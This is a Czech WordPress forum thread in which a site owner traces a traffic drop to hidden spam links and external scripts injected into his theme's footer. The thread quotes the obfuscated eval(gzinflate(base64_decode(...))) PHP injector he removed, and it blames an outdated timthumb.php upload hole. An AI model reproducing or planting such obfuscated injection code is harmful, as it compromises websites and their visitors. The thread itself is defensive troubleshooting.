Změna šablony – pokles návštěvnosti

Úvodní stránka Fórum podpory WordPressu Problémy s WordPressem Změna šablony – pokles návštěvnosti

Zvolené téma obsahuje celkem 14 odpovědí. Do diskuze (3 účastníci) se naposledy zapojil uživatel  Lukenzi a poslední změna je stará 11 let, 6 měsíců.

Aktuálně je na stránce zobrazeno 15 příspěvků - 1. až 15. (z celkem 15)
  • Autor
    Příspěvky
  • #2158

    barvah
    Participant
    Web

    Dobrý den… Už je tomu asi čtvrt roku, co jsme na webu měnili šablonu. Za jednu z obyčejných jsme zvolili profesionální pro filmový magazín.

    Web byl během instalace nové šablony asi 4 dny v módu údržby. Po nahození zpět jsem zjišťoval, že den co den klesá návštěvnost z vyhledávání na googlu. U staré šablony to bylo téměř 1000 unikátních návštěvníků z googlu denně, po změně šablony je to momentálně 200 s odřenýma ušima.

    Myslel jsem, že se to opět vrátí do normálu, ale stagnuje to na těch 150-200 lidí denně. Zkoušel jsem i změnit nadpis webu, ale výraznou změnu neregistruji.

    Změna šablony začala někdy na začátku prázdnin. Od té doby přicházelo čím dám tím míň lidí. Myslel jsem, že to může být dobou prázdnin, ale teď, konec září a vše stejné.

    Máte s něčím takovým podobné zkušenosti?

    (web: http://www.nafilmu.cz)

    #12757

    Lukenzi
    Participant

    Můžu vědět kde jste tuto šablonu koupili?

    Používáte Nástroje pro webmastery od Googlu?

    btw opravil bych si to počítadlo od toplistu, nedává se do hlavičky ale do těla stránky…

    #12758

    barvah
    Participant
    Web

    Šablona pochází od themeforest. Jmenuje se Kernel Theme.

    Nástroje používám. Co bych z nich ale měl vyčíst?

    #12759

    Lukenzi
    Participant

    Minimálně chyby (např. neexistující stránky), vyhledávací dotazy (tedy co uživatelé hledají), obsahová klíčová slova a spoustu jiných velice důležitých věcí.

    Na šablonu jsem se ptal kvůli těm skrytým odkazům v HTML tagu H1 a skriptům co máte v patičce.

    xcelebritygossip.com – Sexy Celebrity Gossip Photos

    lazyhacks.com – LazyHacks

    raw.github.com/gist/3720847/08ad0d2419daf9df63b61b2d99ffb60011cd60d4/fanpage1.js

    raw.github.com/gist/3720847/06e29ee4bc1e973c2f28bc1ade900e879c4a7e75/fanpage2.js

    Dokud budete fungovat jako linkfarma tak je blbost řešit pozici ve vyhledávačích ;)

    Jinak je běžné, že pokud se web přestane na chvíli aktualizovat jeho pozice se ve vyhledávání mírně propadne (zvláš pokud má konkurenci).

    #12760

    barvah
    Participant
    Web

    Toho jsem si předtím nikdy nevšiml. Tušíte v jakým souboru v ftp se podle zdrojového kódu můžou tyto odkazy najít?

    Ty skrytý odkazy jsou nejspíš na všech stránkách webu…

    #12761

    Lukenzi
    Participant

    Ano patrně je tam vkládá nějaký plugin popřípadě váš web obsahuje malware. Doporučuji projít zdejší témata týkající se malware a přečíst si nějaké informace.

    #12762

    barvah
    Participant
    Web

    Ty skryté odkazy jsem nakonec našel v souboru šablony footer.php. Byly v souboru zamaskovaný, takže nešly vyhledat, jen tam na první pohled prostě nepasovaly.

    Přemístil jsem toplist z headeru do footeru a když jsem následně projel zdrojový kód stránky, skryté odkazy byly hned vedle toplistu. Tak jsem smazal několik divných řádků z footeru a vyřešeno…

    Viz. <?php eval (gzinflate(base64_decode(‘NdHJjqJAAADQX+HWGg+KgBSZpQMCsos2CNRlUuwoNGBBsXz9zGX+4CWP

    +vz987MrOyojqKY2xVp95zUask2McHZi/6RZ0qbZ5sNJJSNpDVEUZfHNSF412b2pltBSz37owRIYOoJhLip3JQo7IQHtfUSECGPic12nX/WmR08/SPWhaA7LAIyAjMaB

    G59rBb1BrhcXk45L68m0D1/lUCtSw/mmM

    +fgtTxS8HDfS5N79wlIIkoI1+ymA9fT51AgKgoTRksZiOhC4bCIOdw27MQ/OPfSaSd3FNV2RtifDq6yu9Um5jHPRsZTaITBXtPgUpf9XJd10Ib5vCrGrZXYiwOmLrxC6

    aqOyQlL7+OD8aHB7mufbgES54g+YG24nCqTnyGR0WLBiA7eBonT40R6X62G6turPBBlAGrNukaOWQVzPO+VcJUL0HtZo79mh/SWueohsfsZJ/Bm

    +7dX96Wv0rchR0fJbGJ7mTSd1ly12LEsfyusGU/Oe8hSyPG0lWUWMeNK5U1Zpf1/FObMJHWuHNtjtKD8Ie+FGPz6oLZbavuD+l/9Fw==’ )) ); ?>

    Myslíte, že tyhle odkazy mohly například snižovat postavení v googlu nebo brzdit web nějakým způsobem?

    #12763

    barvah
    Participant
    Web

    Možná bych měl i vyřešit i nadpisy na webu: http://www.seoptimer.com/report/nafilmu.cz/505c24748cfb6

    Název webu by měl být H1 a nadpisy článků a postů H2? Šablona to zřejmě dělá jinak. Znáte nějaký plugin, který by tohle opravil nebo budu muset nějak ručně? Nemám s tímhle vůbec zkušenosti.

    Díky za radu ;-).

    #12764

    Lukenzi
    Participant

    1. Určitě bych doporučil přečíst si něco o SEO optimalizaci, kde se dozvíte co je pro vyhledávače důležité a co vašemu webu chybí.

    2. Předpokládám, že odkazy které jste odstranil se velice brzo znovu objeví. Pro více info mi napište na mejl lukenzi@gmail.com.

    Jednoduše řečeno používáte šablonu, která SEO neviděla ani z vlaku a mimoto obsahuje velmi vážnou bezpečnostní chybu.

    #12765

    admin
    Keymaster
    Web

    Něco nového?

    Dodám jen několik poznámek:

    1) Pokud má web návštěvnost 1000 lidí denně, tak ho určitě nenechávám při změně šablony na 4 dny vypnutý.

    2) Šablona i pluginy mohou výrazně ovlivnit návštěvnost webu, záleží na různých nastaveních a zejména SEO prvcích v záhlaví stránky (title, description, atd). Proto je důležité sledovat Google Webmaster Tools, kde se objevují upozornění na různé problémy a duplicity.

    3) Prémiová šablona Kernel je vcelku oblíbená a i dobře hodnocená, takže se obávám, že tam problém nebude. Byla tato šablona opravdu oficiálně zakoupena? Často se totiž stává, že šablony získané z “neoficiálních” zdrojů zdarma obsahují mnohé nepěkné věci (skryté odkazy, malware, atd).

    4) Veškeré skryté (a ještě k tomu “špatné”) odkazy mohou výrazně snížit návštěvnost a některé vyhledávače mohou web přímo postihnout. Nehledě na to, že se vyhledávače stále vyvíjejí a některé weby jsou upřednostňovány a jiné zase postupně upadají. Nedávno např. Google nasadil různé úpravy pod názvy “Panda” či “Penguin”, které výrazně zahýbaly návštěvností mnoha webů.

    5) Chtělo by to nějaké podrobnější informace o tom, proč poklesla návštěvnost? Lidé přestali chodit z některých vyhledávačů? Byl postižen celý web nebo jen konkrétní klíčová slova? Zkuste se trochu podívat na historii a odvodit z toho, kam a proč přestali lidé chodit…

    Uvítáme pokud se podělíte o informace, jak to vlastně celé pokračuje a doplníte výše uvedené dotazy…

    #12766

    Lukenzi
    Participant

    Šablona vzhledu obsahovala velice starý script timthumb.php a díky němu bylo možné nahrát na webhosting a poté spustit libovolný soubor, mimoto nebyla z hlediska SEO optimalizace zrovna to pravé a z těchto důvodu usuzuji, že ji autor změnil za šablonu Tiberion.

    Bohužel i táto šablona obsahuje naprosto stejnou bezpečnostní chybu!

    #12767

    admin
    Keymaster
    Web

    Díky, Lukenzi! A ten bezpečnostní problém se skriptem timthumb.php se týkal výše odkazované šablony Kernel nebo šlo o nějakou jinou? Na první pohled vypadá šablona dobře a má spíše pozitivní hodnocení… Nechce se mi ani věřit, že by to autoři neaktualizovali?

    #12768

    Lukenzi
    Participant

    Těch šablon, které na první pohled vypadají velice hezky a mají opravdu veliké množství možností nastavení obsahující zastaralou verzi tohoto scriptu je na themeforest (a nejen tam) neskutečné množství. To že to nikdo neřeší je způsobené pravděpodobně pouze tím, že

    1) Né každý web s těmito šablonami je ihned napaden nějakým malwarem nebo rovnou hacknut, takže většina autorů webů s těmito šablonami ani netuší, že kdokoliv může jejich web použít jako linkfarmu v tom lepším případě.

    2) Autoři webů používající tyto šablony netuší, že jejich weby někdo napadl díky tomuto scriptu. Odhalení nějakých skrytých odkazů ve zdroji je většinou jen náhodné, jak jsme se mohli přesvědčit i v tomto případě.

    3) a taky samozřejmě díky tomu, že kontrola na themeforestu se více zajímá o design a “vychytávky” než o to co by mněla…

    #12769

    admin
    Keymaster
    Web

    Amen… Čím více je různých “prémiových” šablon, tak tím více bude podle mě do budoucna přibývat problémů (šablony přestanou být např. aktualizovány). A čím je WordPress jednodušší, tím více nezkušených uživatelů ho používá a tím více se nám to bude do budoucna zase všechno komplikovat… Fórum čekají zlaté časy :-)

    #12770

    Lukenzi
    Participant

    Hezký článek na toto téma vyšel včera zde (anglicky). Popisuje některé výsledky (i se seznamem nezabezpečených šablon) profi penetračního testu šablon na Themeforest.net. Další šablony jsou v komentářích.

    Jsou to jen výsledky náhodně vybraných vzhledů, šablon s nějakou bezpečnostní chybou je na Themeforest.net samozřejmě daleko víc.

Aktuálně je na stránce zobrazeno 15 příspěvků - 1. až 15. (z celkem 15)

Pokud chcete odpovědět na toto téma, musíte se nejdříve přihlásit.

WordPress – novinky, návody a zajímavosti